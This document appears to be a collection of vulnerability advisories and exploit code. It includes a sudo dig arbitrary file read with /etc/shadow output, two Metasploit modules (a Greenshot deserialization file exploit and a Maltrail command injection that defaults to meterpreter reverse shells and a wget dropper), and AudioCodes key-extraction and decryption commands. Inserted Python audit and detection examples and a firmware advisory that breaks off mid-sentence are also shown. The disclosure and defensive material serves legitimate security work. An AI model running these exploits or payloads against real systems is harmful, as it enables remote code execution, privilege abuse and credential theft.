<pre><code>KL-001-2023-001: Cisco ThousandEyes Enterprise Agent Virtual Appliance Arbitrary File Read via sudo dig<br /><br />Title: Cisco ThousandEyes Enterprise Agent Virtual Appliance Arbitrary File Read via sudo dig<br />Advisory ID: KL-001-2023-001<br />Publication Date: 2023.08.17<br />Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2023-001.txt<br /><br /><br />1. Vulnerability Details<br /><br /> Affected Vendor: ThousandEyes<br /> Affected Product: ThousandEyes Enterprise Agent Virtual Appliance<br /> Affected Version: thousandeyes-va-64-18.04 0.218<br /> Platform: Linux / Ubuntu 18.04<br /> CWE Classification: CWE-1395: Dependency on Vulnerable<br /> Third-Party Component,<br /> CWE-1220: Insufficient Granularity of<br /> Access Control<br /> CVE ID: CVE-2023-20217<br /><br /><br />2. Vulnerability Description<br /><br /> An insecure sudo configuration permits a low-privilege user<br /> to read root-only files via the 'dig' command without a<br /> password.<br /><br /><br />3. Technical Description<br /><br /> The ThousandEyes Virtual Appliance is distributed with a<br /> restrictive set of commands that can be executed via sudo,<br /> without having to provide the password for the 'thousandeyes'<br /> account. However, the ability to execute dig via sudo,<br /> allows for reading of arbitrary files using dig's "batch"<br /> mode. This mode allows a user to specify a file of requests,<br /> one per line. The dig command will read the file with elevated<br /> privileges and display the resulting queries (i.e. 
file<br /> contents) back to the user.<br /><br /> thousandeyes@thousandeyes-va:~$ id<br /> uid=1000(thousandeyes) gid=1000(thousandeyes) <br />groups=1000(thousandeyes),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),109(sambashare)<br /> thousandeyes@thousandeyes-va:~$ sudo -l<br /> Matching Defaults entries for thousandeyes on thousandeyes-va:<br /> env_reset, mail_badpass, <br />secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin<br /><br /> User thousandeyes may run the following commands on thousandeyes-va:<br /> (ALL : ALL) ALL<br /> (ALL) NOPASSWD: /bin/systemctl start te-va, /bin/systemctl stop te-va, /bin/systemctl restart te-va, <br />/bin/systemctl status te-va, /bin/systemctl start te-agent, /bin/systemctl stop<br /> te-agent, /bin/systemctl restart te-agent, /bin/systemctl status te-agent, /bin/systemctl start <br />te-browserbot, /bin/systemctl stop te-browserbot, /bin/systemctl restart<br /> te-browserbot, /bin/systemctl status te-browserbot, /sbin/reboot, sudoedit /etc/hosts, /usr/bin/dig, <br />/usr/bin/lsof, /usr/bin/apt-get update, /usr/bin/apt-get install te-agent,<br /> /usr/bin/apt-get install te-browserbot, /usr/bin/apt-get install te-va, /usr/bin/apt-get install te-pa, <br />/usr/bin/apt-get install te-va-unlock, /usr/bin/apt-get install<br /> te-intl-fonts, /usr/bin/apt-get install te-agent-utils, /usr/bin/apt-get install ntpdate, <br />/usr/bin/apt-cache, /usr/bin/te-*, /usr/local/bin/te-*, /usr/local/sbin/te-*<br /> (root) NOPASSWD: /usr/sbin/ntpdate, /usr/sbin/traceroute, /usr/sbin/tcpdump<br /><br /> Here we see that dig is available as root with no password,<br /> and no restrictions on the arguments it can be passed.<br /><br /> thousandeyes@thousandeyes-va:~$ sudo /usr/bin/dig -f /etc/shadow<br /><br /> ; <<>> DiG 9.11.3-1ubuntu1.17-Ubuntu <<>> root:!:19145:0:99999:7:::<br /> ;; global options: +cmd<br /> ;; Got answer:<br /> ;; ->>HEADER<<- opcode: QUERY, status: SERVFAIL, id: 
40036<br /> ;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1<br /><br /> ;; OPT PSEUDOSECTION:<br /> ; EDNS: version: 0, flags:; udp: 65494<br /> ;; QUESTION SECTION:<br /> ;root:!:19145:0:99999:7:::. IN A<br /><br /> ;; Query time: 0 msec<br /> ;; SERVER: 127.0.0.53#53(127.0.0.53)<br /> ;; WHEN: Fri Mar 31 08:00:38 UTC 2023<br /> ;; MSG SIZE rcvd: 54<br /><br /> ; <<>> DiG 9.11.3-1ubuntu1.17-Ubuntu <<>> daemon:!*:18885:0:99999:7:::<br /> ;; Got answer:<br /> ;; ->>HEADER<<- opcode: QUERY, status: SERVFAIL, id: 32743<br /> ;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1<br /><br /> ;; OPT PSEUDOSECTION:<br /> ; EDNS: version: 0, flags:; udp: 65494<br /> ;; QUESTION SECTION:<br /> ;daemon:!*:18885:0:99999:7:::. IN A<br /> ...<br />;thousandeyes:$6$qvB7Zfsh1fFCuBM9$l3X3Gj/7v.IY54N5YMFj5hpd.Fb...<br /> ...<br /><br /><br />4. Mitigation and Remediation Recommendation<br /><br /> The vendor has released a version which remediates the described<br /> vulnerability. Release notes are available at:<br /><br />https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-te-va-priv-esc-PUdgrx8E<br /><br /><br />5. Credit<br /><br /> This vulnerability was discovered by Jim Becher and Hank<br /> Leininger of KoreLogic, Inc.<br /><br /><br />6. 
Disclosure Timeline<br /><br /> 2023.04.26 - KoreLogic submits vulnerability details to Cisco.<br /> 2023.04.26 - Cisco acknowledges receipt and the intention to<br /> investigate.<br /> 2023.05.04 - Cisco notifies KoreLogic that a remediation for this<br /> vulnerability is expected to be available within<br /> 90 days.<br /> 2023.06.30 - 45 business days have elapsed since KoreLogic reported<br /> this vulnerability to the vendor.<br /> 2023.07.11 - Cisco informs KoreLogic that the issue has been<br /> remediated in the latest ThousandEyes Virtual<br /> Appliance and a public advisory will be released<br /> 2023.08.16.<br /> 2023.07.24 - 60 business days have elapsed since KoreLogic reported<br /> this vulnerability to the vendor.<br /> 2023.08.09 - Cisco provides KoreLogic with CVE-2023-20217 to<br /> track this vulnerability.<br /> 2023.08.16 - Cisco public acknowledgement.<br /> 2023.08.17 - KoreLogic public disclosure.<br /><br /><br />7. Proof of Concept<br /><br /> See 3. Technical Description.<br /><br /><br />The contents of this advisory are copyright(c) 2023<br />KoreLogic, Inc. and are licensed under a Creative Commons<br />Attribution Share-Alike 4.0 (United States) License:<br />http://creativecommons.org/licenses/by-sa/4.0/<br /><br />KoreLogic, Inc. is a founder-owned and operated company with a<br />proven track record of providing security services to entities<br />ranging from Fortune 500 to small and mid-sized companies. We<br />are a highly skilled team of senior security consultants doing<br />by-hand security assessments for the most important networks in<br />the U.S. and around the world. We are also developers of various<br />tools and resources aimed at helping the security community.<br />https://www.korelogic.com/about-korelogic.html<br /><br />Our public vulnerability disclosure policy is available at:<br />https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.3.txt<br /><br /></code></pre>
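<p>The listing above is the kind of output a reviewer should be able to audit mechanically: a NOPASSWD entry that names a binary with no arguments lets sudo accept any arguments to it, which is exactly how dig's -f option turns into a root file read. The Python below is an added example (not KoreLogic's code); it parses a constructed excerpt shaped like the advisory's sudo -l output and flags password-less rules that are unrestricted or wildcarded.</p>

```python
"""Audit `sudo -l` output for NOPASSWD rules whose arguments are unrestricted.

Added example, not part of the KoreLogic advisory.  SAMPLE_SUDO_L is a
constructed excerpt shaped like the advisory's listing."""
import re
from dataclasses import dataclass, field

SAMPLE_SUDO_L = """\
Matching Defaults entries for thousandeyes on thousandeyes-va:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin

User thousandeyes may run the following commands on thousandeyes-va:
    (ALL : ALL) ALL
    (ALL) NOPASSWD: /bin/systemctl start te-va, /bin/systemctl stop te-va,
        /bin/systemctl status te-va, sudoedit /etc/hosts, /usr/bin/dig,
        /usr/bin/lsof, /usr/bin/apt-get update, /usr/bin/te-*
    (root) NOPASSWD: /usr/sbin/ntpdate, /usr/sbin/traceroute, /usr/sbin/tcpdump
"""

# Binaries the advisory shows turning an unrestricted NOPASSWD rule into a
# root file read.  Only dig is documented on the page; extend from your own review.
KNOWN_FILE_READERS = {
    "/usr/bin/dig": "dig -f <file> reads the file as root and echoes every "
                    "line back as a query (CVE-2023-20217)",
}


@dataclass
class SudoRule:
    runas: str
    nopasswd: bool
    chunks: list = field(default_factory=list)  # raw command text, possibly wrapped

    @property
    def commands(self):
        return [c.strip() for c in " ".join(self.chunks).split(",") if c.strip()]


def parse_sudo_l(text):
    """Turn the 'may run the following commands' block into SudoRule objects."""
    rules, in_rules = [], False
    for raw in text.splitlines():
        line = raw.strip()
        if "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules or not line:
            continue
        m = re.match(r"^\((?P<runas>[^)]*)\)\s*(?P<rest>.*)$", line)
        if m:
            rest = m.group("rest")
            tags = re.match(r"^((?:[A-Z_]+:\s*)+)", rest)  # NOPASSWD:, SETENV:, ...
            nopasswd = bool(tags and "NOPASSWD:" in tags.group(1))
            if tags:
                rest = rest[tags.end():]
            rules.append(SudoRule(m.group("runas"), nopasswd, [rest]))
        elif rules:
            rules[-1].chunks.append(line)  # terminal-wrapped continuation line
    return rules


def audit(rules):
    """Return (runas, command, reason) for every password-less rule a reviewer
    should look at: 'ALL', no argument restriction, or a wildcard."""
    findings = []
    for rule in rules:
        if not rule.nopasswd:
            continue
        for cmd in rule.commands:
            binary, *args = cmd.split()
            if binary == "ALL":
                findings.append((rule.runas, cmd, "any command, no password"))
            elif not args:
                reason = KNOWN_FILE_READERS.get(
                    binary, "no argument restriction: every flag the binary accepts is allowed")
                if "*" in binary:
                    reason += "; wildcard in the path matches any name with that prefix"
                findings.append((rule.runas, cmd, reason))
            elif any("*" in a for a in args):
                findings.append((rule.runas, cmd,
                                 "wildcard argument: sudoers globs also match spaces, "
                                 "so more may be allowed than intended"))
    return findings


if __name__ == "__main__":
    for runas, cmd, reason in audit(parse_sudo_l(SAMPLE_SUDO_L)):
        print(f"({runas}) {cmd}\n    -> {reason}")
```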
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::FILEFORMAT<br /> include Msf::Post::File<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Greenshot .NET Deserialization Fileformat Exploit',<br /> 'Description' => %q{<br /> There exists a .NET deserialization vulnerability in Greenshot version 1.3.274<br /> and below. The deserialization allows the execution of commands when a user opens<br /> a Greenshot file. The commands execute under the same permissions as the Greenshot<br /> service. Typically, this is the logged-in user.<br /> },<br /> 'DisclosureDate' => '2023-07-26',<br /> 'Author' => [<br /> 'p4r4bellum', # Discovery<br /> 'bwatters-r7', # msf exploit<br /> ],<br /> 'References' => [<br /> ['CVE', '2023-34634'],<br /> ['EDB', '51633']<br /> ],<br /> 'License' => MSF_LICENSE,<br /> 'Platform' => 'win',<br /> 'Arch' => ARCH_CMD,<br /> 'Targets' => [<br /> [ 'Windows', {} ],<br /> ],<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [ARTIFACTS_ON_DISK, SCREEN_EFFECTS]<br /> }<br /> )<br /> )<br /><br /> register_options([<br /> OptPath.new('PNG_FILE', [false, 'PNG file to use'])<br /> ])<br /> end<br /><br /> def exploit<br /> if datastore['PNG_FILE'].blank?<br /> image_file = File.join(Msf::Config.data_directory, 'exploits', 'cve-2023-34634', 'test.png')<br /> else<br /> image_file = datastore['PNG_FILE']<br /> end<br /><br /> datastore['FILENAME'] = Rex::Text.rand_text_alpha(rand(6..13)) if datastore['FILENAME'].blank?<br /> # end_with? replaces the original [-10, -1] slice, which always returned nil<br /> unless datastore['FILENAME'].end_with?('.greenshot')<br /> datastore['FILENAME'] << '.greenshot'<br /> end<br /> cmd = payload.encoded<br /><br /> 
image_data = File.binread(image_file)<br /><br /> deserialize_cmd = ::Msf::Util::DotNetDeserialization.generate(<br /> cmd,<br /> gadget_chain: :WindowsIdentity,<br /> formatter: :BinaryFormatter<br /> )<br /><br /> payload_length = deserialize_cmd.length<br /> outfile = image_data<br /> outfile << deserialize_cmd<br /> outfile << [payload_length].pack('Q')<br /> outfile << 'Greenshot01.02'<br /> file_create(outfile)<br /> end<br />end<br /></code></pre>
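<p>The module lays a .greenshot file out as image bytes, then the serialized object, an 8-byte length and the marker 'Greenshot01.02'. The Python below is an added example (not the module's or Greenshot's code) that walks that layout from the end of a file, reports the serialized segment, and checks it for the BinaryFormatter stream header and for the type name the module's :WindowsIdentity gadget chain has to carry. Assumed: the length is little-endian (Ruby's pack('Q') is native-endian, little-endian on the x86-64 hosts Metasploit runs on); the sample payload is a constructed stub, not a working gadget chain.</p>

```python
"""Inspect a .greenshot file for the serialized trailer that CVE-2023-34634 abuses.

Added example, not code from the Metasploit module or from Greenshot.  Layout is
taken from the module: <image><serialized object><8-byte length><'Greenshot01.02'>.
The sample below is a constructed stub, not a working gadget chain."""
import struct
from dataclasses import dataclass

MARKER = b"Greenshot01.02"
# MS-NRBC SerializationHeaderRecord: RecordTypeEnum 0, RootId 1, HeaderId -1,
# MajorVersion 1, MinorVersion 0: the fixed 17-byte prefix of a BinaryFormatter stream.
BINARYFORMATTER_HEADER = bytes([0x00]) + struct.pack("<iiii", 1, -1, 1, 0)
PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"
# Type names a gadget chain must name somewhere in the stream; the module uses
# :WindowsIdentity, so the list is kept to what the page supports.
GADGET_TYPE_NAMES = [b"System.Security.Principal.WindowsIdentity"]


@dataclass
class GreenshotReport:
    has_trailer: bool
    image_is_png: bool = False
    serialized_len: int = 0
    binaryformatter: bool = False
    gadget_hits: tuple = ()


def split_trailer(blob):
    """Return (image, serialized) or None when marker and length do not line up."""
    if not blob.endswith(MARKER):
        return None
    body = blob[:-len(MARKER)]
    if len(body) < 8:
        return None
    (length,) = struct.unpack("<Q", body[-8:])  # assumed little-endian, see lead-in
    body = body[:-8]
    if length > len(body):
        return None
    cut = len(body) - length
    return body[:cut], body[cut:]


def inspect_greenshot(blob):
    """The BinaryFormatter header alone is what Greenshot expects to find in that
    position; the signal worth alerting on is a known gadget type name."""
    parts = split_trailer(blob)
    if parts is None:
        return GreenshotReport(has_trailer=False, image_is_png=blob.startswith(PNG_SIGNATURE))
    image, serialized = parts
    return GreenshotReport(
        has_trailer=True,
        image_is_png=image.startswith(PNG_SIGNATURE),
        serialized_len=len(serialized),
        binaryformatter=serialized.startswith(BINARYFORMATTER_HEADER),
        gadget_hits=tuple(n.decode() for n in GADGET_TYPE_NAMES if n in serialized),
    )


# Constructed sample: PNG signature plus filler, and a stub "stream" that only
# carries the header and a type-name string (arbitrary bytes around it).
SAMPLE_IMAGE = PNG_SIGNATURE + b"\x00" * 32
SAMPLE_SERIALIZED = (BINARYFORMATTER_HEADER + b"\x0c\x02\x00\x00\x00"
                     + b"System.Security.Principal.WindowsIdentity" + b"\x0b")
SAMPLE_FILE = (SAMPLE_IMAGE + SAMPLE_SERIALIZED
               + struct.pack("<Q", len(SAMPLE_SERIALIZED)) + MARKER)

if __name__ == "__main__":
    print(inspect_greenshot(SAMPLE_FILE))
    print(inspect_greenshot(SAMPLE_IMAGE))
```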
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::CmdStager<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Maltrail Unauthenticated Command Injection',<br /> 'Description' => %q{<br /> Maltrail is a malicious traffic detection system, utilizing publicly<br /> available blacklists containing malicious and/or generally suspicious trails.<br /> The Maltrail versions < 0.54 is suffering from a command injection vulnerability.<br /> The `subprocess.check_output` function in `mailtrail/core/http.py` contains<br /> a command injection vulnerability in the `params.get("username")` parameter.<br /> An attacker can exploit this vulnerability by injecting arbitrary OS commands<br /> into the username parameter. The injected commands will be executed with the<br /> privileges of the running process. 
This vulnerability can be exploited remotely<br /> without authentication.<br /><br /> Successfully tested against Maltrail versions 0.52 and 0.53.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'Ege BALCI <egebalci[at]pm.me>', # msf module<br /> 'Chris Wild', # original PoC, analysis<br /> ],<br /> 'References' => [<br /> ['EDB', '51676'],<br /> ['URL', 'https://huntr.dev/bounties/be3c5204-fbd9-448d-b97c-96a8d2941e87/'],<br /> ['URL', 'https://github.com/stamparm/maltrail/issues/19146']<br /> ],<br /> 'Platform' => ['unix', 'linux'],<br /> 'Privileged' => false,<br /> 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],<br /> 'Targets' => [<br /> [<br /> 'Unix Command',<br /> {<br /> 'Platform' => 'unix',<br /> 'Arch' => ARCH_CMD,<br /> 'Type' => :unix_cmd,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'cmd/unix/python/meterpreter/reverse_tcp'<br /> }<br /> }<br /> ],<br /> [<br /> 'Linux Dropper',<br /> {<br /> 'Platform' => 'linux',<br /> 'Arch' => [ARCH_X86, ARCH_X64],<br /> 'Type' => :linux_dropper,<br /> 'CmdStagerFlavor' => :wget,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'<br /> }<br /> }<br /> ]<br /> ],<br /> 'DisclosureDate' => '2023-07-31',<br /> 'DefaultTarget' => 0,<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => []<br /> }<br /> )<br /> )<br /> register_options(<br /> [<br /> Opt::RPORT(8338),<br /> OptString.new('TARGETURI', [ true, 'The URI of the Maltrail server', '/'])<br /> ]<br /> )<br /> end<br /><br /> def check<br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path),<br /> 'method' => 'GET'<br /> )<br /> return CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?<br /> return CheckCode::Unknown("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200<br /><br /> version = Rex::Version.new(Regexp.last_match(1)) if res.body =~ 
%r{\(v<b>([0-9.]+)</b>\)}<br /><br /> # No version string in the body: the service answered but could not be fingerprinted<br /> return CheckCode::Detected("#{peer} - Maltrail responded but no version string was found") if version.nil?<br /><br /> if version < Rex::Version.new('0.54')<br /> return CheckCode::Appears("Version Detected: #{version}")<br /> end<br /><br /> CheckCode::Safe("Version Detected: #{version}")<br /> end<br /><br /> def execute_command(cmd, _opts = {})<br /> send_request_raw( # A raw request: the body must not be URL-encoded<br /> 'uri' => normalize_uri(target_uri.path, 'login'),<br /> 'method' => 'POST',<br /> 'headers' => {<br /> 'ctype' => 'application/x-www-form-urlencoded'<br /> },<br /> 'data' => "username=;`echo+\"#{Rex::Text.encode_base64(cmd)}\"+|+base64+-d+|+sh;#`" # The '+' characters stand in for spaces<br /> )<br /> end<br /><br /> def exploit<br /> case target['Type']<br /> when :unix_cmd<br /> print_status("Executing #{target.name}...")<br /> execute_command(payload.encoded)<br /> when :linux_dropper<br /> print_status("Executing #{target.name}...")<br /> execute_cmdstager<br /> end<br /> end<br />end<br /></code></pre>
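<p>The bug class behind this module is a request parameter interpolated into a string that a shell runs. The Python below is an added example, modelled on the pattern the description gives rather than copied from Maltrail: a vulnerable command builder next to the hardened argv form with an allow-list, plus a detector for the POST /login body that a WAF or log review could apply. All names are illustrative.</p>

```python
"""Command injection pattern from the Maltrail description: vulnerable builder,
hardened builder, and a detector for the urlencoded /login body.

Added example, not Maltrail's code and not the module's; names are illustrative."""
import re
import subprocess
from urllib.parse import parse_qs

USERNAME_RE = re.compile(r"^[A-Za-z0-9._@-]{1,64}$")
# Characters that let /bin/sh start a second command or substitute one.  Backticks
# and $( ) keep their meaning even inside a double-quoted string.
SHELL_META = re.compile(r"[;&|`\n]|\$\(")


def build_log_cmd_vulnerable(username, accepted):
    """String handed to a shell (shell=True): sh parses the username, so a
    backtick or $(...) inside it runs with the service's privileges."""
    status = "Accepted" if accepted else "Failed"
    return 'logger -p auth.info -t maltrail "%s password for %s"' % (status, username)


def build_log_cmd_hardened(username, accepted):
    """argv list: each element reaches execve() as one argument and no shell
    parses it; the allow-list additionally bounds what a username may contain."""
    if not USERNAME_RE.match(username):
        raise ValueError("username rejected by allow-list")
    status = "Accepted" if accepted else "Failed"
    return ["logger", "-p", "auth.info", "-t", "maltrail",
            "%s password for %s" % (status, username)]


def log_attempt(username, accepted):
    """Run the hardened form; shell=False is the default but spelled out here."""
    return subprocess.run(build_log_cmd_hardened(username, accepted),
                          shell=False, check=False)


def login_body_is_suspicious(body):
    """Detection for WAF rules or log review: does the urlencoded body carry a
    username with shell metacharacters?  parse_qs turns '+' into a space, as
    the server would before using the value."""
    fields = parse_qs(body, keep_blank_values=True)
    return any(SHELL_META.search(u) for u in fields.get("username", []))


# Constructed request bodies for the detector.
BENIGN_BODY = "username=alice&password=hunter2"
INJECTED_BODY = "username=guest`id`&password=x"

if __name__ == "__main__":
    print(build_log_cmd_vulnerable("guest`id`", False))
    print(build_log_cmd_hardened("alice", True))
    print(login_body_is_suspicious(INJECTED_BODY), login_body_is_suspicious(BENIGN_BODY))
```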
<pre><code>-----BEGIN PGP SIGNED MESSAGE-----<br />Hash: SHA512<br /><br />Advisory ID: SYSS-2022-054<br />Product: AudioCodes VoIP Phones<br />Manufacturer: AudioCodes Ltd.<br />Affected Version(s): Firmware Versions >= 3.4.8.M4<br />Tested Version(s): Firmware Version 3.4.4.1000<br />Vulnerability Type: Use of Hard-coded Cryptographic Key (CWE-321)<br />Risk Level: Medium<br />Solution Status: Open<br />Manufacturer Notification: 2022-11-11<br />Solution Date: N.A.<br />Public Disclosure: 2023-08-10<br />CVE Reference: CVE-2023-22956<br />Author of Advisory: Moritz Abrell, SySS GmbH<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Overview:<br /><br />AudioCodes VoIP phones are modern desk phones which are used for the<br />operation in enterprise environments.<br /><br />The manufacturer describes the product as follows (see [1]):<br /><br />"The AudioCodes 400HD series of IP phones is a range of easy-to-use,<br />feature-rich desktop devices for the service provider hosted services,<br />enterprise IP telephony and contact center markets. 
Based on the same<br />advanced, field-proven underlying technology as our other VoIP products,<br />AudioCodes high quality IP phones enable systems integrators and end<br />customers to build end-to-end VoIP solutions."<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Vulnerability Details:<br /><br />The AudioCodes VoIP phones can be managed centrally, whereby configuration<br />files are provided and requested by the phones at a central location.<br />These configuration files can also be provided in encrypted form.<br />This is intended to protect sensitive information within the configuration<br />files from unauthorized access.<br /><br />Due to the use of a hardcoded cryptographic key, an attacker is able to<br />decrypt encrypted configuration files and retrieve sensitive information.<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Proof of Concept (PoC):<br /><br />By analyzing the ELF executable "decryption_tool" of an AudioCodes IP phone<br />firmware in a disassembler and decompiler, e.g. Ghidra, the encryption<br />mechanism could be reversed and the hardcoded cryptographic key could be<br />extracted.<br /><br />Used encryption algorithm: Triple DES in CBC mode<br />Memory address of the 64-byte secret for OpenSSL key and IV derivation: 00001e8f<br /><br />Extracting the secret:<br /> #> offset=$(python3 -c 'print(int("00001e8f", base=16))')<br /> #> dd skip=$offset count=64 if=decryption_tool of=secret.bin bs=1<br /><br />Deriving the key and IV from the 64-byte secret:<br /> #> openssl enc -des-ede3-cbc -P -pass pass:h4dArat[...] 
-nosalt<br /> <br /> key = 40DA61FB4831FF53[...]<br /> iv = C614B77A[..]<br /><br />With the derived key and IV, it is possible to decrypt encrypted configuration<br />files.<br /><br />As a proof of concept, the OpenSSL command-line tool can be used for<br />decryption:<br /> #> openssl enc -d -des-ede3-cbc -pass pass:h4dArat[...] -nosalt \<br /> -in /tmp/encrypted_config.cfg -out /tmp/plain_config.cfg<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Solution:<br /><br />Update devices to firmware version 3.4.8.M4 and define an individual and<br />strong secret from which the encryption key is derived.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclosure Timeline:<br /><br />2022-11-03: Vulnerability discovered<br />2022-11-11: Vulnerability reported to manufacturer<br />2022-12-12: Vulnerability confirmed by AudioCodes Ltd.<br />2023-01-19: AudioCodes Ltd. adapts the documentation so that it no<br /> longer states that the passwords are encrypted but obfuscated<br />2023-07-13: AudioCodes Ltd. 
informs that the upcoming release 3.4.8.M4<br /> will include a feature that allows setting a custom password<br /> from which the key will be derived<br />2023-08-10: Public disclosure at BlackHat USA[4]<br />2023-08-11: Public disclosure at https://blog.syss.com[5]<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />References:<br /><br />[1] AudioCodes IP Phones Product Website<br /> https://www.audiocodes.com/solutions-products/products/ip-phones<br />[2] SySS Security Advisory SYSS-2022-054<br /> https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2022-054.txt<br />[3] SySS Responsible Disclosure Policy<br /> https://www.syss.de/en/responsible-disclosure-policy<br />[4] BlackHat USA Briefings Session<br /> https://www.blackhat.com/us-23/briefings/schedule/#zero-touch-pwn-abusing-zooms-zero-touch-provisioning-for-remote-attacks-on-desk-phones-31341<br />[5] Detailed Blog Post<br /> https://blog.syss.com/posts/zero-touch-pwn/<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Credits:<br /><br />This security vulnerability was found by Moritz Abrell of SySS GmbH.<br /><br />E-Mail: moritz.abrell@syss.de<br />Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Abrell.asc<br />Key Fingerprint: 2927 7EB6 1A20 0679 79E9 87E6 AE0C 9BF8 F134 8B53<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclaimer:<br /><br />The information provided in this security advisory is provided "as is"<br />and without warranty of any kind. Details of this security advisory may<br />be updated in order to provide as accurate information as possible. 
The<br />latest version of this security advisory is available on the SySS website.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Copyright:<br /><br />Creative Commons - Attribution (by) - Version 3.0<br />URL:http://creativecommons.org/licenses/by/3.0/deed.en<br /></code></pre>
<pre><code>-----BEGIN PGP SIGNED MESSAGE-----<br />Hash: SHA512<br /><br />Advisory ID: SYSS-2022-055<br />Product: AudioCodes VoIP Phones<br />Manufacturer: AudioCodes Ltd.<br />Affected Version(s): Firmware Versions >= 3.4.4.1000<br />Tested Version(s): Firmware Version 3.4.4.1000<br />Vulnerability Type: Missing Immutable Root of Trust in Hardware (CWE-1326)<br />Risk Level: Medium<br />Solution Status: Open<br />Manufacturer Notification: 2022-11-14<br />Solution Date: N.A.<br />Public Disclosure: 2023-08-10<br />CVE Reference: CVE-2023-22955<br />Authors of Advisory: Matthias Deeg, SySS GmbH<br /> Moritz Abrell, SySS GmbH<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Overview:<br /><br />AudioCodes VoIP phones are modern desk phones which are used for the<br />operation in enterprise environments.<br /><br />The manufacturer describes the product as follows (see [1]):<br /><br />"The AudioCodes 400HD series of IP phones is a range of easy-to-use,<br />feature-rich desktop devices for the service provider hosted services,<br />enterprise IP telephony and contact center markets. 
Based on the same<br />advanced, field-proven underlying technology as our other VoIP products,<br />AudioCodes high quality IP phones enable systems integrators and end<br />customers to build end-to-end VoIP solutions."<br /><br />Due to insufficient firmware validation, an attacker can store<br />malicious firmware on AudioCodes IP phones.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Vulnerability Details:<br /><br />By analyzing the firmware image and update mechanism of AudioCodes IP<br />phones, it was identified that parsing and verification of the firmware<br />image is done by the ELF executable "flasher" which is executed from<br />the script "run_ramfs_for_upgrade.sh" located at the path<br />"/home/ipphone/scripts/".<br /><br />When analyzing the software tool "flasher", SySS found out that the<br />validation of firmware images only consists of simple checksum checks for<br />different firmware components.<br /><br />Thus, by knowing how to calculate and where to store the required checksums<br />for the "flasher" tool, an attacker is able to store malicious firmware on<br />AudioCodes IP phones.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Proof of Concept (PoC):<br /><br />An AudioCodes IP phone's firmware image file contains an image header<br />followed by different sections, e.g.:<br /><br /> 1. Firmware image header<br /> 2. bootloader.img<br /> 3. rootfs.ext4<br /> 4. phone.img<br /> 5. section.map<br /> 6. flasher<br /> 7. release<br /> 8. end.section<br /><br />Each section starts with the 4 magic 